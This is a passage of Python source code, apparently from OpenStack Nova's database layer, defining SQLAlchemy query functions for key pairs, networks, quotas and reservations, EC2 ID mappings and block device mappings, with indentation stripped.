filter_by(instance_uuid=instance_uuid)
if columns is None:
columns = ['numa_topology', 'pci_requests', 'flavor', 'vcpu_model',
'migration_context']
for column in columns:
query = query.options(undefer(column))
instance_extra = query.first()
return instance_extra
###################
@require_context
@main_context_manager.writer
def key_pair_create(context, values):
try:
key_pair_ref = models.KeyPair()
key_pair_ref.update(values)
key_pair_ref.save(context.session)
return key_pair_ref
except db_exc.DBDuplicateEntry:
raise exception.KeyPairExists(key_name=values['name'])
@require_context
@main_context_manager.writer
def key_pair_destroy(context, user_id, name):
result = model_query(context, models.KeyPair).\
filter_by(user_id=user_id).\
filter_by(name=name).\
soft_delete()
if not result:
raise exception.KeypairNotFound(user_id=user_id, name=name)
@require_context
@main_context_manager.reader
def key_pair_get(context, user_id, name):
result = model_query(context, models.KeyPair).\
filter_by(user_id=user_id).\
filter_by(name=name).\
first()
if not result:
raise exception.KeypairNotFound(user_id=user_id, name=name)
return result
@require_context
@main_context_manager.reader
def key_pair_get_all_by_user(context, user_id):
return model_query(context, models.KeyPair, read_deleted="no").\
filter_by(user_id=user_id).\
all()
@require_context
@main_context_manager.reader
def key_pair_count_by_user(context, user_id):
return model_query(context, models.KeyPair, read_deleted="no").\
filter_by(user_id=user_id).\
count()
###################
@main_context_manager.writer
def network_associate(context, project_id, network_id=None, force=False):
"""Associate a project with a network.
called by project_get_networks under certain conditions
and network manager add_network_to_project()
only associate if the project doesn't already have a network
or if force is True
force solves race condition where a fresh project has multiple instance
builds simultaneously picked up by multiple network hosts which attempt
to associate the project with multiple networks
force should only be used as a direct consequence of user request
all automated requests should not use force
"""
def network_query(project_filter, id=None):
filter_kwargs = {'project_id': project_filter}
if id is not None:
filter_kwargs['id'] = id
return model_query(context, models.Network, read_deleted="no").\
filter_by(**filter_kwargs).\
with_lockmode('update').\
first()
if not force:
# find out if project has a network
network_ref = network_query(project_id)
if force or not network_ref:
# in force mode or project doesn't have a network so associate
# with a new network
# get new network
network_ref = network_query(None, network_id)
if not network_ref:
raise exception.NoMoreNetworks()
# associate with network
# NOTE(vish): if with_lockmode isn't supported, as in sqlite,
# then this has concurrency issues
network_ref['project_id'] = project_id
context.session.add(network_ref)
return network_ref
def _network_ips_query(context, network_id):
return model_query(context, models.FixedIp, read_deleted="no").\
filter_by(network_id=network_id)
@main_context_manager.reader
def network_count_reserved_ips(context, network_id):
return _network_ips_query(context, network_id).\
filter_by(reserved=True).\
count()
@main_context_manager.writer
def network_create_safe(context, values):
network_ref = models.Network()
network_ref['uuid'] = str(uuid.uuid4())
network_ref.update(values)
try:
network_ref.save(context.session)
return network_ref
except db_exc.DBDuplicateEntry:
raise exception.DuplicateVlan(vlan=values['vlan'])
@main_context_manager.writer
def network_delete_safe(context, network_id):
result = model_query(context, models.FixedIp, read_deleted="no").\
filter_by(network_id=network_id).\
filter_by(allocated=True).\
count()
if result != 0:
raise exception.NetworkInUse(network_id=network_id)
network_ref = _network_get(context, network_id=network_id)
model_query(context, models.FixedIp, read_deleted="no").\
filter_by(network_id=network_id).\
soft_delete()
context.session.delete(network_ref)
@main_context_manager.writer
def network_disassociate(context, network_id, disassociate_host,
disassociate_project):
net_update = {}
if disassociate_project:
net_update['project_id'] = None
if disassociate_host:
net_update['host'] = None
network_update(context, network_id, net_update)
def _network_get(context, network_id, project_only='allow_none'):
result = model_query(context, models.Network, project_only=project_only).\
filter_by(id=network_id).\
first()
if not result:
raise exception.NetworkNotFound(network_id=network_id)
return result
@require_context
@main_context_manager.reader
def network_get(context, network_id, project_only='allow_none'):
return _network_get(context, network_id, project_only=project_only)
@require_context
@main_context_manager.reader
def network_get_all(context, project_only):
result = model_query(context, models.Network, read_deleted="no",
project_only=project_only).all()
if not result:
raise exception.NoNetworksFound()
return result
@require_context
@main_context_manager.reader
def network_get_all_by_uuids(context, network_uuids, project_only):
result = model_query(context, models.Network, read_deleted="no",
project_only=project_only).\
filter(models.Network.uuid.in_(network_uuids)).\
all()
if not result:
raise exception.NoNetworksFound()
# check if the result contains all the networks
# we are looking for
for network_uuid in network_uuids:
for network in result:
if network['uuid'] == network_uuid:
break
else:
if project_only:
raise exception.NetworkNotFoundForProject(
network_uuid=network_uuid, project_id=context.project_id)
raise exception.NetworkNotFound(network_id=network_uuid)
return result
def _get_associated_fixed_ips_query(context, network_id, host=None):
# NOTE(vish): The ugly joins here are to solve a performance issue and
# should be removed once we can add and remove leases
# without regenerating the whole list
vif_and = and_(models.VirtualInterface.id ==
models.FixedIp.virtual_interface_id,
models.VirtualInterface.deleted == 0)
inst_and = and_(models.Instance.uuid == models.FixedIp.instance_uuid,
models.Instance.deleted == 0)
# NOTE(vish): This subquery left joins the minimum interface id for each
# instance. If the join succeeds (i.e. the 11th column is not
# null), then the fixed ip is on the first interface.
subq = context.session.query(
func.min(models.VirtualInterface.id).label("id"),
models.VirtualInterface.instance_uuid).\
group_by(models.VirtualInterface.instance_uuid).subquery()
subq_and = and_(subq.c.id == models.FixedIp.virtual_interface_id,
subq.c.instance_uuid == models.VirtualInterface.instance_uuid)
query = context.session.query(
models.FixedIp.address,
models.FixedIp.instance_uuid,
models.FixedIp.network_id,
models.FixedIp.virtual_interface_id,
models.VirtualInterface.address,
models.Instance.hostname,
models.Instance.updated_at,
models.Instance.created_at,
models.FixedIp.allocated,
models.FixedIp.leased,
subq.c.id).\
filter(models.FixedIp.deleted == 0).\
filter(models.FixedIp.network_id == network_id).\
join((models.VirtualInterface, vif_and)).\
join((models.Instance, inst_and)).\
outerjoin((subq, subq_and)).\
filter(models.FixedIp.instance_uuid != null()).\
filter(models.FixedIp.virtual_interface_id != null())
if host:
query = query.filter(models.Instance.host == host)
return query
@main_context_manager.reader
def network_get_associated_fixed_ips(context, network_id, host=None):
# FIXME(sirp): since this returns fixed_ips, this would be better named
# fixed_ip_get_all_by_network.
query = _get_associated_fixed_ips_query(context, network_id, host)
result = query.all()
data = []
for datum in result:
cleaned = {}
cleaned['address'] = datum[0]
cleaned['instance_uuid'] = datum[1]
cleaned['network_id'] = datum[2]
cleaned['vif_id'] = datum[3]
cleaned['vif_address'] = datum[4]
cleaned['instance_hostname'] = datum[5]
cleaned['instance_updated'] = datum[6]
cleaned['instance_created'] = datum[7]
cleaned['allocated'] = datum[8]
cleaned['leased'] = datum[9]
# NOTE(vish): default_route is True if this fixed ip is on the first
# interface its instance.
cleaned['default_route'] = datum[10] is not None
data.append(cleaned)
return data
@main_context_manager.reader
def network_in_use_on_host(context, network_id, host):
query = _get_associated_fixed_ips_query(context, network_id, host)
return query.count() > 0
def _network_get_query(context):
return model_query(context, models.Network, read_deleted="no")
@main_context_manager.reader
def network_get_by_uuid(context, uuid):
result = _network_get_query(context).filter_by(uuid=uuid).first()
if not result:
raise exception.NetworkNotFoundForUUID(uuid=uuid)
return result
@main_context_manager.reader
def network_get_by_cidr(context, cidr):
result = _network_get_query(context).\
filter(or_(models.Network.cidr == cidr,
models.Network.cidr_v6 == cidr)).\
first()
if not result:
raise exception.NetworkNotFoundForCidr(cidr=cidr)
return result
@main_context_manager.reader
def network_get_all_by_host(context, host):
fixed_host_filter = or_(models.FixedIp.host == host,
and_(models.FixedIp.instance_uuid != null(),
models.Instance.host == host))
fixed_ip_query = model_query(context, models.FixedIp,
(models.FixedIp.network_id,)).\
outerjoin((models.Instance,
models.Instance.uuid ==
models.FixedIp.instance_uuid)).\
filter(fixed_host_filter)
# NOTE(vish): return networks that have host set
# or that have a fixed ip with host set
# or that have an instance with host set
host_filter = or_(models.Network.host == host,
models.Network.id.in_(fixed_ip_query.subquery()))
return _network_get_query(context).filter(host_filter).all()
@oslo_db_api.wrap_db_retry(max_retries=5, retry_on_deadlock=True,
retry_on_request=True)
@main_context_manager.writer
def network_set_host(context, network_id, host_id):
network_ref = _network_get_query(context).\
filter_by(id=network_id).\
first()
if not network_ref:
raise exception.NetworkNotFound(network_id=network_id)
if network_ref.host:
return None
rows_updated = _network_get_query(context).\
filter_by(id=network_id).\
filter_by(host=None).\
update({'host': host_id})
if not rows_updated:
LOG.debug('The row was updated in a concurrent transaction, '
'we will fetch another row')
raise db_exc.RetryRequest(
exception.NetworkSetHostFailed(network_id=network_id))
@require_context
@main_context_manager.writer
def network_update(context, network_id, values):
network_ref = _network_get(context, network_id)
network_ref.update(values)
try:
network_ref.save(context.session)
except db_exc.DBDuplicateEntry:
raise exception.DuplicateVlan(vlan=values['vlan'])
return network_ref
###################
@require_context
@main_context_manager.reader
def quota_get(context, project_id, resource, user_id=None):
model = models.ProjectUserQuota if user_id else models.Quota
query = model_query(context, model).\
filter_by(project_id=project_id).\
filter_by(resource=resource)
if user_id:
query = query.filter_by(user_id=user_id)
result = query.first()
if not result:
if user_id:
raise exception.ProjectUserQuotaNotFound(project_id=project_id,
user_id=user_id)
else:
raise exception.ProjectQuotaNotFound(project_id=project_id)
return result
@require_context
@main_context_manager.reader
def quota_get_all_by_project_and_user(context, project_id, user_id):
user_quotas = model_query(context, models.ProjectUserQuota,
(models.ProjectUserQuota.resource,
models.ProjectUserQuota.hard_limit)).\
filter_by(project_id=project_id).\
filter_by(user_id=user_id).\
all()
result = {'project_id': project_id, 'user_id': user_id}
for user_quota in user_quotas:
result[user_quota.resource] = user_quota.hard_limit
return result
@require_context
@main_context_manager.reader
def quota_get_all_by_project(context, project_id):
rows = model_query(context, models.Quota, read_deleted="no").\
filter_by(project_id=project_id).\
all()
result = {'project_id': project_id}
for row in rows:
result[row.resource] = row.hard_limit
return result
@require_context
@main_context_manager.reader
def quota_get_all(context, project_id):
result = model_query(context, models.ProjectUserQuota).\
filter_by(project_id=project_id).\
all()
return result
@main_context_manager.writer
def quota_create(context, project_id, resource, limit, user_id=None):
per_user = user_id and resource not in PER_PROJECT_QUOTAS
quota_ref = models.ProjectUserQuota() if per_user else models.Quota()
if per_user:
quota_ref.user_id = user_id
quota_ref.project_id = project_id
quota_ref.resource = resource
quota_ref.hard_limit = limit
try:
quota_ref.save(context.session)
except db_exc.DBDuplicateEntry:
raise exception.QuotaExists(project_id=project_id, resource=resource)
return quota_ref
@main_context_manager.writer
def quota_update(context, project_id, resource, limit, user_id=None):
per_user = user_id and resource not in PER_PROJECT_QUOTAS
model = models.ProjectUserQuota if per_user else models.Quota
query = model_query(context, model).\
filter_by(project_id=project_id).\
filter_by(resource=resource)
if per_user:
query = query.filter_by(user_id=user_id)
result = query.update({'hard_limit': limit})
if not result:
if per_user:
raise exception.ProjectUserQuotaNotFound(project_id=project_id,
user_id=user_id)
else:
raise exception.ProjectQuotaNotFound(project_id=project_id)
###################
@require_context
@main_context_manager.reader
def quota_class_get(context, class_name, resource):
result = model_query(context, models.QuotaClass, read_deleted="no").\
filter_by(class_name=class_name).\
filter_by(resource=resource).\
first()
if not result:
raise exception.QuotaClassNotFound(class_name=class_name)
return result
@main_context_manager.reader
def quota_class_get_default(context):
rows = model_query(context, models.QuotaClass, read_deleted="no").\
filter_by(class_name=_DEFAULT_QUOTA_NAME).\
all()
result = {'class_name': _DEFAULT_QUOTA_NAME}
for row in rows:
result[row.resource] = row.hard_limit
return result
@require_context
@main_context_manager.reader
def quota_class_get_all_by_name(context, class_name):
rows = model_query(context, models.QuotaClass, read_deleted="no").\
filter_by(class_name=class_name).\
all()
result = {'class_name': class_name}
for row in rows:
result[row.resource] = row.hard_limit
return result
@main_context_manager.writer
def quota_class_create(context, class_name, resource, limit):
quota_class_ref = models.QuotaClass()
quota_class_ref.class_name = class_name
quota_class_ref.resource = resource
quota_class_ref.hard_limit = limit
quota_class_ref.save(context.session)
return quota_class_ref
@main_context_manager.writer
def quota_class_update(context, class_name, resource, limit):
result = model_query(context, models.QuotaClass, read_deleted="no").\
filter_by(class_name=class_name).\
filter_by(resource=resource).\
update({'hard_limit': limit})
if not result:
raise exception.QuotaClassNotFound(class_name=class_name)
###################
@require_context
@main_context_manager.reader
def quota_usage_get(context, project_id, resource, user_id=None):
query = model_query(context, models.QuotaUsage, read_deleted="no").\
filter_by(project_id=project_id).\
filter_by(resource=resource)
if user_id:
if resource not in PER_PROJECT_QUOTAS:
result = query.filter_by(user_id=user_id).first()
else:
result = query.filter_by(user_id=None).first()
else:
result = query.first()
if not result:
raise exception.QuotaUsageNotFound(project_id=project_id)
return result
def _quota_usage_get_all(context, project_id, user_id=None):
query = model_query(context, models.QuotaUsage, read_deleted="no").\
filter_by(project_id=project_id)
result = {'project_id': project_id}
if user_id:
query = query.filter(or_(models.QuotaUsage.user_id == user_id,
models.QuotaUsage.user_id == null()))
result['user_id'] = user_id
rows = query.all()
for row in rows:
if row.resource in result:
result[row.resource]['in_use'] += row.in_use
result[row.resource]['reserved'] += row.reserved
else:
result[row.resource] = dict(in_use=row.in_use,
reserved=row.reserved)
return result
@require_context
@main_context_manager.reader
def quota_usage_get_all_by_project_and_user(context, project_id, user_id):
return _quota_usage_get_all(context, project_id, user_id=user_id)
@require_context
@main_context_manager.reader
def quota_usage_get_all_by_project(context, project_id):
return _quota_usage_get_all(context, project_id)
def _quota_usage_create(project_id, user_id, resource, in_use,
reserved, until_refresh, session):
quota_usage_ref = models.QuotaUsage()
quota_usage_ref.project_id = project_id
quota_usage_ref.user_id = user_id
quota_usage_ref.resource = resource
quota_usage_ref.in_use = in_use
quota_usage_ref.reserved = reserved
quota_usage_ref.until_refresh = until_refresh
# updated_at is needed for judgement of max_age
quota_usage_ref.updated_at = timeutils.utcnow()
quota_usage_ref.save(session)
return quota_usage_ref
@main_context_manager.writer
def quota_usage_update(context, project_id, user_id, resource, **kwargs):
updates = {}
for key in ['in_use', 'reserved', 'until_refresh']:
if key in kwargs:
updates[key] = kwargs[key]
result = model_query(context, models.QuotaUsage, read_deleted="no").\
filter_by(project_id=project_id).\
filter_by(resource=resource).\
filter(or_(models.QuotaUsage.user_id == user_id,
models.QuotaUsage.user_id == null())).\
update(updates)
if not result:
raise exception.QuotaUsageNotFound(project_id=project_id)
###################
def _reservation_create(uuid, usage, project_id, user_id, resource,
delta, expire, session):
reservation_ref = models.Reservation()
reservation_ref.uuid = uuid
reservation_ref.usage_id = usage['id']
reservation_ref.project_id = project_id
reservation_ref.user_id = user_id
reservation_ref.resource = resource
reservation_ref.delta = delta
reservation_ref.expire = expire
reservation_ref.save(session)
return reservation_ref
###################
# NOTE(johannes): The quota code uses SQL locking to ensure races don't
# cause under or over counting of resources. To avoid deadlocks, this
# code always acquires the lock on quota_usages before acquiring the lock
# on reservations.
def _get_project_user_quota_usages(context, project_id, user_id):
rows = model_query(context, models.QuotaUsage,
read_deleted="no").\
filter_by(project_id=project_id).\
order_by(models.QuotaUsage.id.asc()).\
with_lockmode('update').\
all()
proj_result = dict()
user_result = dict()
# Get the total count of in_use,reserved
for row in rows:
proj_result.setdefault(row.resource,
dict(in_use=0, reserved=0, total=0))
proj_result[row.resource]['in_use'] += row.in_use
proj_result[row.resource]['reserved'] += row.reserved
proj_result[row.resource]['total'] += (row.in_use + row.reserved)
if row.user_id is None or row.user_id == user_id:
user_result[row.resource] = row
return proj_result, user_result
def _create_quota_usage_if_missing(user_usages, resource, until_refresh,
project_id, user_id, session):
"""Creates a QuotaUsage record and adds to user_usages if not present.
:param user_usages: dict of resource keys to QuotaUsage records. This is
updated if resource is not in user_usages yet or
until_refresh is not None.
:param resource: The resource being checked for quota usage.
:param until_refresh: Count of reservations until usage is refreshed,
int or None
:param project_id: The project being checked for quota usage.
:param user_id: The user being checked for quota usage.
:param session: DB session holding a transaction lock.
:return: True if a new QuotaUsage record was created and added
to user_usages, False otherwise.
"""
new_usage = None
if resource not in user_usages:
user_id_to_use = user_id
if resource in PER_PROJECT_QUOTAS:
user_id_to_use = None
new_usage = _quota_usage_create(project_id, user_id_to_use, resource,
0, 0, until_refresh or None, session)
user_usages[resource] = new_usage
return new_usage is not None
def _is_quota_refresh_needed(quota_usage, max_age):
"""Determines if a quota usage refresh is needed.
:param quota_usage: A QuotaUsage object for a given resource.
:param max_age: Number of seconds between subsequent usage refreshes.
:return: True if a refresh is needed, False otherwise.
"""
refresh = False
if quota_usage.in_use < 0:
# Negative in_use count indicates a desync, so try to
# heal from that...
LOG.debug('in_use has dropped below 0; forcing refresh for '
'QuotaUsage: %s', dict(quota_usage))
refresh = True
elif quota_usage.until_refresh is not None:
quota_usage.until_refresh -= 1
if quota_usage.until_refresh <= 0:
refresh = True
elif max_age and (timeutils.utcnow() -
quota_usage.updated_at).seconds >= max_age:
refresh = True
return refresh
def _refresh_quota_usages(quota_usage, until_refresh, in_use):
"""Refreshes quota usage for the given resource.
:param quota_usage: A QuotaUsage object for a given resource.
:param until_refresh: Count of reservations until usage is refreshed,
int or None
:param in_use: Actual quota usage for the resource.
"""
if quota_usage.in_use != in_use:
LOG.info(_LI('quota_usages out of sync, updating. '
'project_id: %(project_id)s, '
'user_id: %(user_id)s, '
'resource: %(res)s, '
'tracked usage: %(tracked_use)s, '
'actual usage: %(in_use)s'),
{'project_id': quota_usage.project_id,
'user_id': quota_usage.user_id,
'res': quota_usage.resource,
'tracked_use': quota_usage.in_use,
'in_use': in_use})
else:
LOG.debug('QuotaUsage has not changed, refresh is unnecessary for: %s',
dict(quota_usage))
# Update the usage
quota_usage.in_use = in_use
quota_usage.until_refresh = until_refresh or None
def _calculate_overquota(project_quotas, user_quotas, deltas,
project_usages, user_usages):
"""Checks if any resources will go over quota based on the request.
:param project_quotas: dict of resource quotas (limits) for the project.
:param user_quotas: dict of resource quotas (limits) for the user.
:param deltas: dict of resource keys to positive/negative quota
changes for the resources in a given operation.
:param project_usages: dict of resource keys to QuotaUsage records for the
project.
:param user_usages: dict of resource keys to QuotaUsage records for the
user.
:return: list of resources that are over-quota for the
operation.
"""
overs = []
for res, delta in deltas.items():
# We can't go over-quota if we're not reserving anything.
if delta >= 0:
# We can't go over-quota if we have unlimited quotas.
# over if the project usage + delta is more than project quota
if 0 <= project_quotas[res] < delta + project_usages[res]['total']:
LOG.debug('Request is over project quota for resource '
'"%(res)s". Project limit: %(limit)s, delta: '
'%(delta)s, current total project usage: %(total)s',
{'res': res, 'limit': project_quotas[res],
'delta': delta,
'total': project_usages[res]['total']})
overs.append(res)
# We can't go over-quota if we have unlimited quotas.
# over if the user usage + delta is more than user quota
elif 0 <= user_quotas[res] < delta + user_usages[res]['total']:
LOG.debug('Request is over user quota for resource '
'"%(res)s". User limit: %(limit)s, delta: '
'%(delta)s, current total user usage: %(total)s',
{'res': res, 'limit': user_quotas[res],
'delta': delta, 'total': user_usages[res]['total']})
overs.append(res)
return overs
@require_context
@oslo_db_api.wrap_db_retry(max_retries=5, retry_on_deadlock=True)
@main_context_manager.writer
def quota_reserve(context, resources, project_quotas, user_quotas, deltas,
expire, until_refresh, max_age, project_id=None,
user_id=None):
elevated = context.elevated()
if project_id is None:
project_id = context.project_id
if user_id is None:
user_id = context.user_id
# Get the current usages
project_usages, user_usages = _get_project_user_quota_usages(
context, project_id, user_id)
# Handle usage refresh
work = set(deltas.keys())
while work:
resource = work.pop()
# Do we need to refresh the usage?
created = _create_quota_usage_if_missing(user_usages, resource,
until_refresh, project_id,
user_id, context.session)
refresh = created or _is_quota_refresh_needed(
user_usages[resource], max_age)
# OK, refresh the usage
if refresh:
# Grab the sync routine
sync = QUOTA_SYNC_FUNCTIONS[resources[resource].sync]
updates = sync(elevated, project_id, user_id)
for res, in_use in updates.items():
# Make sure we have a destination for the usage!
_create_quota_usage_if_missing(user_usages, res,
until_refresh, project_id,
user_id, context.session)
_refresh_quota_usages(user_usages[res], until_refresh,
in_use)
# Because more than one resource may be refreshed
# by the call to the sync routine, and we don't
# want to double-sync, we make sure all refreshed
# resources are dropped from the work set.
work.discard(res)
# NOTE(Vek): We make the assumption that the sync
# routine actually refreshes the
# resources that it is the sync routine
# for. We don't check, because this is
# a best-effort mechanism.
# Check for deltas that would go negative
unders = [res for res, delta in deltas.items()
if delta < 0 and
delta + user_usages[res].in_use < 0]
# Now, let's check the quotas
# NOTE(Vek): We're only concerned about positive increments.
# If a project has gone over quota, we want them to
# be able to reduce their usage without any
# problems.
for key, value in user_usages.items():
if key not in project_usages:
LOG.debug('Copying QuotaUsage for resource "%(key)s" from '
'user_usages into project_usages: %(value)s',
{'key': key, 'value': dict(value)})
project_usages[key] = value
overs = _calculate_overquota(project_quotas, user_quotas, deltas,
project_usages, user_usages)
# NOTE(Vek): The quota check needs to be in the transaction,
# but the transaction doesn't fail just because
# we're over quota, so the OverQuota raise is
# outside the transaction. If we did the raise
# here, our usage updates would be discarded, but
# they're not invalidated by being over-quota.
# Create the reservations
if not overs:
reservations = []
for res, delta in deltas.items():
reservation = _reservation_create(
str(uuid.uuid4()),
user_usages[res],
project_id,
user_id,
res, delta, expire,
context.session)
reservations.append(reservation.uuid)
# Also update the reserved quantity
# NOTE(Vek): Again, we are only concerned here about
# positive increments. Here, though, we're
# worried about the following scenario:
#
# 1) User initiates resize down.
# 2) User allocates a new instance.
# 3) Resize down fails or is reverted.
# 4) User is now over quota.
#
# To prevent this, we only update the
# reserved value if the delta is positive.
if delta > 0:
user_usages[res].reserved += delta
# Apply updates to the usages table
for usage_ref in user_usages.values():
context.session.add(usage_ref)
if unders:
LOG.warning(_LW("Change will make usage less than 0 for the following "
"resources: %s"), unders)
if overs:
if project_quotas == user_quotas:
usages = project_usages
else:
# NOTE(mriedem): user_usages is a dict of resource keys to
# QuotaUsage sqlalchemy dict-like objects and doen't log well
# so convert the user_usages values to something useful for
# logging. Remove this if we ever change how
# _get_project_user_quota_usages returns the user_usages values.
user_usages = {k: dict(in_use=v['in_use'], reserved=v['reserved'],
total=v['total'])
for k, v in user_usages.items()}
usages = user_usages
usages = {k: dict(in_use=v['in_use'], reserved=v['reserved'])
for k, v in usages.items()}
LOG.debug('Raise OverQuota exception because: '
'project_quotas: %(project_quotas)s, '
'user_quotas: %(user_quotas)s, deltas: %(deltas)s, '
'overs: %(overs)s, project_usages: %(project_usages)s, '
'user_usages: %(user_usages)s',
{'project_quotas': project_quotas,
'user_quotas': user_quotas,
'overs': overs, 'deltas': deltas,
'project_usages': project_usages,
'user_usages': user_usages})
raise exception.OverQuota(overs=sorted(overs), quotas=user_quotas,
usages=usages)
return reservations
def _quota_reservations_query(context, reservations):
"""Return the relevant reservations."""
# Get the listed reservations
return model_query(context, models.Reservation, read_deleted="no").\
filter(models.Reservation.uuid.in_(reservations)).\
with_lockmode('update')
@require_context
@oslo_db_api.wrap_db_retry(max_retries=5, retry_on_deadlock=True)
@main_context_manager.writer
def reservation_commit(context, reservations, project_id=None, user_id=None):
_project_usages, user_usages = _get_project_user_quota_usages(
context, project_id, user_id)
reservation_query = _quota_reservations_query(context, reservations)
for reservation in reservation_query.all():
usage = user_usages[reservation.resource]
if reservation.delta >= 0:
usage.reserved -= reservation.delta
usage.in_use += reservation.delta
reservation_query.soft_delete(synchronize_session=False)
@require_context
@oslo_db_api.wrap_db_retry(max_retries=5, retry_on_deadlock=True)
@main_context_manager.writer
def reservation_rollback(context, reservations, project_id=None, user_id=None):
_project_usages, user_usages = _get_project_user_quota_usages(
context, project_id, user_id)
reservation_query = _quota_reservations_query(context, reservations)
for reservation in reservation_query.all():
usage = user_usages[reservation.resource]
if reservation.delta >= 0:
usage.reserved -= reservation.delta
reservation_query.soft_delete(synchronize_session=False)
@main_context_manager.writer
def quota_destroy_all_by_project_and_user(context, project_id, user_id):
model_query(context, models.ProjectUserQuota, read_deleted="no").\
filter_by(project_id=project_id).\
filter_by(user_id=user_id).\
soft_delete(synchronize_session=False)
model_query(context, models.QuotaUsage, read_deleted="no").\
filter_by(project_id=project_id).\
filter_by(user_id=user_id).\
soft_delete(synchronize_session=False)
model_query(context, models.Reservation, read_deleted="no").\
filter_by(project_id=project_id).\
filter_by(user_id=user_id).\
soft_delete(synchronize_session=False)
@main_context_manager.writer
def quota_destroy_all_by_project(context, project_id):
model_query(context, models.Quota, read_deleted="no").\
filter_by(project_id=project_id).\
soft_delete(synchronize_session=False)
model_query(context, models.ProjectUserQuota, read_deleted="no").\
filter_by(project_id=project_id).\
soft_delete(synchronize_session=False)
model_query(context, models.QuotaUsage, read_deleted="no").\
filter_by(project_id=project_id).\
soft_delete(synchronize_session=False)
model_query(context, models.Reservation, read_deleted="no").\
filter_by(project_id=project_id).\
soft_delete(synchronize_session=False)
@oslo_db_api.wrap_db_retry(max_retries=5, retry_on_deadlock=True)
@main_context_manager.writer
def reservation_expire(context):
current_time = timeutils.utcnow()
reservation_query = model_query(
context, models.Reservation, read_deleted="no").\
filter(models.Reservation.expire < current_time)
for reservation in reservation_query.join(models.QuotaUsage).all():
if reservation.delta >= 0:
reservation.usage.reserved -= reservation.delta
context.session.add(reservation.usage)
reservation_query.soft_delete(synchronize_session=False)
###################
def _ec2_volume_get_query(context):
return model_query(context, models.VolumeIdMapping, read_deleted='yes')
def _ec2_snapshot_get_query(context):
return model_query(context, models.SnapshotIdMapping, read_deleted='yes')
@require_context
@main_context_manager.writer
def ec2_volume_create(context, volume_uuid, id=None):
"""Create ec2 compatible volume by provided uuid."""
ec2_volume_ref = models.VolumeIdMapping()
ec2_volume_ref.update({'uuid': volume_uuid})
if id is not None:
ec2_volume_ref.update({'id': id})
ec2_volume_ref.save(context.session)
return ec2_volume_ref
@require_context
@main_context_manager.reader
def ec2_volume_get_by_uuid(context, volume_uuid):
result = _ec2_volume_get_query(context).\
filter_by(uuid=volume_uuid).\
first()
if not result:
raise exception.VolumeNotFound(volume_id=volume_uuid)
return result
@require_context
@main_context_manager.reader
def ec2_volume_get_by_id(context, volume_id):
result = _ec2_volume_get_query(context).\
filter_by(id=volume_id).\
first()
if not result:
raise exception.VolumeNotFound(volume_id=volume_id)
return result
@require_context
@main_context_manager.writer
def ec2_snapshot_create(context, snapshot_uuid, id=None):
"""Create ec2 compatible snapshot by provided uuid."""
ec2_snapshot_ref = models.SnapshotIdMapping()
ec2_snapshot_ref.update({'uuid': snapshot_uuid})
if id is not None:
ec2_snapshot_ref.update({'id': id})
ec2_snapshot_ref.save(context.session)
return ec2_snapshot_ref
@require_context
@main_context_manager.reader
def ec2_snapshot_get_by_ec2_id(context, ec2_id):
result = _ec2_snapshot_get_query(context).\
filter_by(id=ec2_id).\
first()
if not result:
raise exception.SnapshotNotFound(snapshot_id=ec2_id)
return result
@require_context
@main_context_manager.reader
def ec2_snapshot_get_by_uuid(context, snapshot_uuid):
result = _ec2_snapshot_get_query(context).\
filter_by(uuid=snapshot_uuid).\
first()
if not result:
raise exception.SnapshotNotFound(snapshot_id=snapshot_uuid)
return result
###################
def _block_device_mapping_get_query(context, columns_to_join=None):
if columns_to_join is None:
columns_to_join = []
query = model_query(context, models.BlockDeviceMapping)
for column in columns_to_join:
query = query.options(joinedload(column))
return query
def _scrub_empty_str_values(dct, keys_to_scrub):
"""Remove any keys found in sequence keys_to_scrub from the dict
if they have the value ''.
"""
for key in keys_to_scrub:
if key in dct and dct[key] == '':
del dct[key]
def _from_legacy_values(values, legacy, allow_updates=False):
if legacy:
if allow_updates and block_device.is_safe_for_update(values):
return values
else:
return block_device.BlockDeviceDict.from_legacy(values)
else:
return values
@require_context
@pick_context_manager_writer
def block_device_mapping_create(context, values, legacy=True):
_scrub_empty_str_values(values, ['volume_size'])
values = _from_legacy_values(values, legacy)
convert_objects_related_datetimes(values)
bdm_ref = models.BlockDeviceMapping()
bdm_ref.update(values)
bdm_ref.save(context.session)
return bdm_ref
@require_context
@pick_context_manager_writer
def block_device_mapping_update(context, bdm_id, values, legacy=True):
_scrub_empty_str_values(values, ['volume_size'])
values = _from_legacy_values(values, legacy, allow_updates=True)
convert_objects_related_datetimes(values)
query = _block_device_mapping_get_query(context).filter_by(id=bdm_id)
query.update(values)
return query.first()
@pick_context_manager_writer
def block_device_mapping_update_or_create(context, values, legacy=True):
_scrub_empty_str_values(values, ['volume_size'])
values = _from_legacy_values(values, legacy, allow_updates=True)
convert_objects_related_datetimes(values)
result = None
# NOTE(xqueralt): Only update a BDM when device_name was provided. We
# allow empty device names so they will be set later by the manager.
if values['device_name']:
query = _block_device_mapping_get_query(context)
result = query.filter_by(instance_uuid=values['instance_uuid'],
device_name=values['device_name']).first()
if result:
result.update(values)
else:
# Either the device_name doesn't exist in the database yet, or no
# device_name was provided. Both cases mean creating a new BDM.
result = models.BlockDeviceMapping(**values)
result.save(context.session)
# NOTE(xqueralt): Prevent from having multiple swap devices for the
# same instance. This will delete all the existing ones.
if block_device.new_format_is_swap(values):
query = _block_device_mapping_get_query(context)
query = query.filter_by(instance_uuid=values['instance_uuid'],
source_type='blank', guest_format='swap')
query = query.filter(models.BlockDeviceMapping.id != result.id)
query.soft_delete()
return result
@require_context
@pick_context_manager_reader_allow_async
def block_device_mapping_get_all_by_instance_uuids(context, instance_uuids):
if not instance_uuids:
return []
return _block_device_mapping_get_query(context).filter(
models.BlockDeviceMapping.instance_uuid.in_(instance_uuids)).all()
@require_context
@pick_context_manager_reader_allow_async
def block_device_mapping_get_all_by_instance(context, instance_uuid):
return _block_device_mapping_get_query(context).\
filter_by(instance_uuid=instance_uuid).\
all()
@require_context
@pick_context_manager_reader
def block_device_mapping_get_all_by_volume_id(context, volume_id,
columns_to_join=None):
return _block_device_mapping_get_query(context,
columns_to_join=columns_to_join).\
filter_by(volume_id=volume_id).\
all()
@require_context
@pick_context_manager_reader
def block_device_mapping_get_by_instance_and_volume_id(context, volume_id,
instance_uuid,
columns_to_join=None):
return _block_device_mapping_get_query(context,
columns_to_join=columns_to_join).\
filter_by(volume_id=volume_id).\
filter_by(instance_uuid=instance_uuid).\
first()
@require_context
@pick_context_manager_writer
def block_device_mapping_destroy(context, bdm_id):
_block_device_mapping_get_query(context).\
filter_by(id=bdm_id).\
soft_delete()
@require_context
@pick_context_manager_writer
